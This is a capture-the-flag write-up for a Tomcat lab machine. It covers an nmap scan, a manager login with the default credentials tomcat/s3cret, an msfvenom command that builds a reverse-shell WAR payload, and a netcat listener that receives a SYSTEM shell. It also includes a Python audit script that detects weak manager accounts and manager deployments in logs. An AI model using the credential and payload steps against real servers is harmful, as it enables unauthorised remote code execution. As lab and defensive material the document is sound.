Enumeration
Nmap the target machine.
nmap -sC -sV -Pn 10.10.10.95 -oN nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-09 00:55 EDT
Nmap scan report for 10.10.10.95
Host is up (0.18s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
There is a web server on port 8080.
The Apache Tomcat home page shows the version info.
I found buttons for the manager app and host manager.
I tried to log in, but when I failed, the page with credentials was displayed.
ID: tomcat PW: s3cret
Managed to log in as Jerry! I can also see there are upload and deploy buttons.
I think we can upload a reverse shell.
But the web page says it only accepts files with the .war extension.
I don’t know what war is. I googled it and found out it stands for Web Application Resource.
The first time, I just renamed the file to xxx.war. However, it didn’t go well; I kept receiving errors.
Therefore, I googled it and spent quite a long time. Then, luckily, I came across this blog post.
https://medium.com/@cyb0rgs/exploiting-apache-tomcat-manager-script-role-974e4307cd00
We need to upload a payload made using msfvenom.
msfvenom -p java/shell_reverse_tcp lhost=x.x.x.x lport=xxxx -f war -o file.war
You can refer to this site too.
We can upload it to the web page.
Listen on the port we set and click the file. Then we will get a connection.
nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.95] 49194
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
We are in!
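As an added, defender-side example (not code from this writeup): a small Python audit that flags manager-role accounts in tomcat-users.xml that use default or short passwords, and pulls successful manager deployments out of Tomcat access logs. The XML, the log lines (in the AccessLogValve "common" pattern) and the default-credential list are constructed here; the manager endpoints /manager/html/upload and /manager/text/deploy are Tomcat's real ones.

```python
import re
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml, modelled on the credentials seen on this box.
TOMCAT_USERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script,admin-gui"/>
  <user username="deployer" password="Xy9!long-and-random-42" roles="manager-script"/>
</tomcat-users>
"""
# Example/default pairs that vulnerability scanners try first (constructed list).
KNOWN_DEFAULTS = {("tomcat", "tomcat"), ("tomcat", "s3cret"), ("admin", "admin"), ("tomcat", "")}
# Any of these roles can deploy a WAR, i.e. run code as the Tomcat service account.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx"}

def audit_tomcat_users(xml_text):
    """Return (username, [manager roles]) for accounts with manager roles and weak passwords."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if el.tag.split("}")[-1] != "user":  # ignore the namespace prefix, if any
            continue
        name, pw = el.get("username", ""), el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        exposed = roles & MANAGER_ROLES
        if exposed and ((name, pw) in KNOWN_DEFAULTS or len(pw) < 12):
            findings.append((name, sorted(exposed)))
    return findings

# Constructed access-log lines: a 401, a login, an HTML upload, and a text-interface deploy.
ACCESS_LOG = """\
10.10.14.2 - - [09/Apr/2024:00:57:01 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.2 - tomcat [09/Apr/2024:00:57:30 -0400] "GET /manager/html HTTP/1.1" 200 15847
10.10.14.2 - tomcat [09/Apr/2024:00:58:12 -0400] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 16311
10.10.14.9 - deployer [09/Apr/2024:01:10:05 -0400] "PUT /manager/text/deploy?path=/app HTTP/1.1" 200 40
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
DEPLOY_PATHS = {"/manager/html/upload", "/manager/text/deploy"}

def find_manager_deploys(log_text):
    """Return (ip, user, timestamp, endpoint) for every successful WAR deployment via the manager."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m["method"] in ("POST", "PUT") and m["status"] == "200":
            endpoint = m["path"].split("?", 1)[0]
            if endpoint in DEPLOY_PATHS:
                hits.append((m["ip"], m["user"], m["ts"], endpoint))
    return hits
```

Every hit should map to a change-ticketed deployment; an upload from an address that earlier produced 401s on /manager/html is the pattern this box shows.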
User and root flags
We are in a Windows system now.
The flags for user and root are in the C:\Users\Administrator\Desktop\flags directory.
There is no need to escalate privileges, since the shell already runs as nt authority\system.
Thoughts
This machine is rated as easy.
The point was to figure out how to create a proper payload using msfvenom.
If you can do that, this machine is super easy. However, if you are not familiar with it, then I think it takes quite a bit of time to research.
From now on, if I come across Tomcat, I will be reminded of msfvenom and putting a payload inside a .war file.